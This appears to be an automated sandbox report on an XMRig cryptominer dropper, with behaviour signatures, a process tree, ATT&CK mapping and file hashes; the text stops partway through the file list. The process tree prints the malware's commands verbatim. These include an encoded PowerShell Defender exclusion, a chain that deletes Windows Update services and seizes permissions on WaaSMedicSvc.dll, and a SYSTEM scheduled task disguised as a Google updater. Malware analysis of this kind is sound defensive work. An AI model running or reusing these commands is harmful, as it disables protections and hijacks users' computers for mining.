Analysis

  • max time kernel
    299s
  • max time network
    287s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    27-06-2022 04:33

General

  • Target

    e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe

  • Size

    7.4MB

  • MD5

    34719a80e9cca827371d5f1e44f10168

  • SHA1

    3ea872bd581ce47505a312d74f6b0e897202d021

  • SHA256

    e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec

  • SHA512

    2f96ffcb8a45d7dcb525c952e63cdd466ed60eb6bc624756f4c9d815ea40c2fe14da9e4905f7494db24d02c83354b8759adf677ea3c75b986626a376b0a53acf

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 2 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe
    "C:\Users\Admin\AppData\Local\Temp\e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:1852
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4212
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4324
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4368
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4688
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:4800
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:4828
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:4856
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:4944
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:4988
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:5008
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:5048
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:5084
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:5116
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:1836
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:4308
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:4396
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4376
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1952
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4496
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4472
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:4544
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:4564
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:4584
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:4604
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:4676
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:4436
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:4432
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4720
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4788
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4844
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4924
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4960
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5036
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                          5⤵
                          • Creates scheduled task(s)
                          PID:4240
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                        4⤵
                          PID:4608
                          • C:\Windows\system32\schtasks.exe
                            schtasks /run /tn "GoogleUpdateTaskMachineQC"
                            5⤵
                              PID:4704
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
                        2⤵
                        • Checks computer location settings
                        PID:3152
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
                        2⤵
                        • Drops startup file
                        PID:1796
                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                      1⤵
                      • Drops file in Windows directory
                      • Modifies Internet Explorer settings
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      PID:3000
                    • C:\Windows\system32\browser_broker.exe
                      C:\Windows\system32\browser_broker.exe -Embedding
                      1⤵
                      • Modifies Internet Explorer settings
                      PID:1084
                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                      1⤵
                      • Modifies registry class
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:2680
                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                      1⤵
                      • Drops file in Windows directory
                      • Modifies Internet Explorer settings
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      PID:64
                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                      1⤵
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1764
                    • C:\Program Files\Chrome\updater.exe
                      "C:\Program Files\Chrome\updater.exe"
                      1⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4284
                      • C:\Windows\System32\conhost.exe
                        "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                        2⤵
                        • Drops file in Drivers directory
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Drops file in Program Files directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4992
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
                          3⤵
                            PID:5052
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
                              4⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3992
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            3⤵
                              PID:4188
                              • C:\Windows\system32\sc.exe
                                sc stop UsoSvc
                                4⤵
                                • Launches sc.exe
                                PID:5072
                              • C:\Windows\system32\sc.exe
                                sc stop WaaSMedicSvc
                                4⤵
                                • Launches sc.exe
                                PID:4448
                              • C:\Windows\system32\sc.exe
                                sc stop wuauserv
                                4⤵
                                • Launches sc.exe
                                PID:4516
                              • C:\Windows\system32\sc.exe
                                sc stop bits
                                4⤵
                                • Launches sc.exe
                                PID:4420
                              • C:\Windows\system32\sc.exe
                                sc stop dosvc
                                4⤵
                                • Launches sc.exe
                                PID:4564
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                4⤵
                                • Modifies registry key
                                PID:4556
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                4⤵
                                • Modifies registry key
                                PID:4380
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                4⤵
                                • Modifies registry key
                                PID:4676
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                4⤵
                                • Modifies registry key
                                PID:4524
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                4⤵
                                • Modifies registry key
                                PID:4760
                              • C:\Windows\system32\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:4356
                              • C:\Windows\system32\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:4672
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:4296
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:4256
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:4304
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:4744
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                4⤵
                                  PID:4696
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                  4⤵
                                    PID:4608
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                    4⤵
                                      PID:4364
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                      4⤵
                                        PID:4812
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                        4⤵
                                          PID:3060
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                          4⤵
                                            PID:1312
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                            4⤵
                                              PID:4048
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            3⤵
                                              PID:2752
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-ac 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4340
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-dc 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:508
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-ac 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4664
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-dc 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4588
                                            • C:\Windows\System32\conhost.exe
                                              C:\Windows\System32\conhost.exe
                                              3⤵
                                                PID:4508
                                                • C:\Windows\System32\conhost.exe
                                                  "C:\Windows\System32\conhost.exe" "ojfwdlyws"
                                                  4⤵
                                                    PID:4244
                                                • C:\Windows\explorer.exe
                                                  C:\Windows\explorer.exe lvsbssvxocugcs1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                  3⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4372
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies registry class
                                              PID:4828
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies registry class
                                              PID:4976

                                            Network

                                            MITRE ATT&CK Matrix ATT&CK v6

                                            Execution

                                            Scheduled Task

                                            1
                                            T1053

                                            Persistence

                                            Modify Existing Service

                                            2
                                            T1031

                                            Scheduled Task

                                            1
                                            T1053

                                            Privilege Escalation

                                            Scheduled Task

                                            1
                                            T1053

                                            Defense Evasion

                                            Modify Registry

                                            3
                                            T1112

                                            Virtualization/Sandbox Evasion

                                            1
                                            T1497

                                            Impair Defenses

                                            1
                                            T1562

                                            File Permissions Modification

                                            1
                                            T1222

                                            Discovery

                                            Query Registry

                                            3
                                            T1012

                                            Virtualization/Sandbox Evasion

                                            1
                                            T1497

                                            System Information Discovery

                                            4
                                            T1082

                                            Impact

                                            Service Stop

                                            1
                                            T1489

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Program Files\Chrome\updater.exe
                                              Filesize

                                              7.1MB

                                              MD5

                                              e85216c5e3420493ea698778ccf16073

                                              SHA1

                                              ae034212c790f7181ea92426a5dcc08cafd0b711

                                              SHA256

                                              d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                              SHA512

                                              8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                            • C:\Program Files\Chrome\updater.exe
                                              Filesize

                                              7.1MB

                                              MD5

                                              e85216c5e3420493ea698778ccf16073

                                              SHA1

                                              ae034212c790f7181ea92426a5dcc08cafd0b711

                                              SHA256

                                              d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                              SHA512

                                              8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                            • C:\Windows\Temp\lol.bat
                                              Filesize

                                              59B

                                              MD5

                                              f580e0e80cc87b25e38ea2c0c8059d04

                                              SHA1

                                              299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                              SHA256

                                              9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                              SHA512

                                              5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                            • C:\Windows\Temp\run.bat
                                              Filesize

                                              98B

                                              MD5

                                              731afe244b2414169a5f630d52646e56

                                              SHA1

                                              e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                              SHA256

                                              6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                              SHA512

                                              84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                            • C:\Windows\Temp\setup.exe
                                              Filesize

                                              7.1MB

                                              MD5

                                              e85216c5e3420493ea698778ccf16073

                                              SHA1

